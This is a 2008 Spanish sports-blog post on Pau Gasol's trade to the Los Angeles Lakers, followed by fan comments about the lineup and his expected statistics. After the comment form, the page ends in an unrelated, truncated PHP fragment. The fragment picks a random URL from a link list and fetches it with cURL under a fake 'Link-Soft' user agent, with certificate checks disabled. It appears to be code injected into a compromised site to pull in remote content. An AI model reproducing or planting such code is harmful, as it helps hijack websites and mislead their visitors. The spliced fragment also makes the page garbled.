Gasol a los Lakers

01 de February de 2008 por txusma

Ningún rumor hacia sospechar el movimiento que se acaba de producir. Cuando todo indicaba que finalmente Gasol no se movería de Memphis y que en caso de hacerlo se iría a Chicago, Los Lakers se han sacado de la manga un movimiento genial y se han hecho con los servicios del ala-pivot español.

Concretamente Gasol acaba en la franquicia con más glamour de la NBA a cambio de Kwame Brown (jugoso expiring), Javaris Crittentton y 2 primeras rondas de draft. Fenomenal movimiento de los amarillos aunque habrá que esperar más tiempo para poder decidir decir lo mismo de los ositos. Algunas informaciones hablan de que los derechos de Marc Gasol han podido viajar también hacia Memphis pero no están confirmado.

Ojo a los Lakers en Play-offs: Si Bynum vuelve de su lesión en forma un quinteto Fisher – Kobe – Odom – Gasol – Bynum es de mucha, mucha calidad. Po rsu parte los Grizzlies han cerrado otro trade por el cual reciben a Jason Collins, de los Nets a cambio de Stromile Swift, que había tenido serias discrepancias con su entrenador.

Comenta

11 comentarios a esta entrada

  1. Jabho dice:
    #1

    En que estarán pensando en Memhis… bueno, barra libre para Gay

      Citar

  2. Olafur dice:
    #2

    Uff Memphis demostrando que nunca serán nadie en la NBA, a Lakers menudo quinteto de órdago les queda, y además la pajara hasta la vuelta de Bynum se subsana con el amigo Gasol, cuando vuelva el chiquitín, menuda dupla mortífera en el juego interior….

      Citar

  3. RusticoColorao dice:
    #3

    La madre que parió al inútil de Paxson

      Citar

  4. MagicJohnson32 dice:
    #4

    Todavía no me lo creo.

    Estoy emocionao

      Citar

  5. Garci dice:
    #5

    Toma Ya!!!

    Increible, pensando que este año iva a ser otro año sin mas para los lakers. Con Kobe pidiendo el traspaso durante la pretemporada.
    Pero como cambia la vida, Bryant jugando mas en equipo, pero anotando como estos años atras, Bynum demostrando sus dotes como pivot de futuro de los lakers, y ahora cogen y ponen la puntilla fichando a Gasol. Y encima no se llevan a nadie importante del equipo. Esto es la ostia, jeje!!

      Citar

  6. Pow_Brolin dice:
    #6

    Definitivamente los Ositos se decantan por Gay como lider del equipo … ya veremos si tiene tanta paciencia como Gasol y en cuanto tiempo pide el traspaso xDD

    En otro roden de cosas; la que se nos avecina señores!!! Acabo de encargar un Hercules repleto hasta los topes de vacunas para la fiebre Amarilla.

      Citar

  7. Viva_Dirk dice:
    #7

    Impresionante alegria la que nos llevamos los aficionador amarillos.

    Me parece imposible que los derechos de Marc hallan ido en ese trade, cuando puede juntarse con su hermano el año que viene, y ojito que Navarro es agente libre y los Lakers podrian darle parte de la mid-level.

    En fin, ¡¡¡¡¡hemos vuelto!!!!!

      Citar

  8. txusma dice:
    #8

    Se confirma que los derechos de Marc van para Memphis lo que me parece incluso una declaracion de intenciones para el año q viene por parte de Memphis. Sinceramente creo q si Milicic esta jugando en la NBA, Marc Gasol tb lo puede hacer, e incluso mejor.
    Lo de los Lakers es que es tremendo lo mires por donde lo mires: Kobe, Odom, Bynum y Gasol. Se cumple todo lo que demandabamos para el español: Jugar al lado de un autentico crack que le quitara la presion de anotar continuamente, jugar al lado de un pivot de calidad que le hiciera mucha parte del trabajo sucio, jugar al lado de… de… Coño! Los amarillos aun pueden largar a Odom y traerse a Kidd!!

      Citar

  9. xapa_croack dice:
    #9

    vamos k eso significaria que gasol bajará sus estadisticas considerablemente?

      Citar

  10. MagicJohnson32 dice:
    #10

    Gasol debería estar alrededor de 15 puntos y 9 rebotes. A ver si el liberarse de responsabilidad ofensiva le hace aplicarse un poco más en defensa.

      Citar

  11. telekoman dice:
    #11

    Lo de la defensa creo que es difícil. Yo espero, por el bien de Cencerro, que aumente las asistencias al menos en un par y que la media de puntos no baje de 17. Teniendo en cuenta que en su etapa NBA no ha destacado por ser un jugador de grandes finales de partido, espero que los Lakers lo utilicen de jugador referencia en ataque durante la primera mitad, dejando a Kobe más descansado para la segunda parte donde podría tirar a placer y donde Gasol engordaría el número de asistencias siendo el base desde dentro. Llamarme iluso si queréis.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>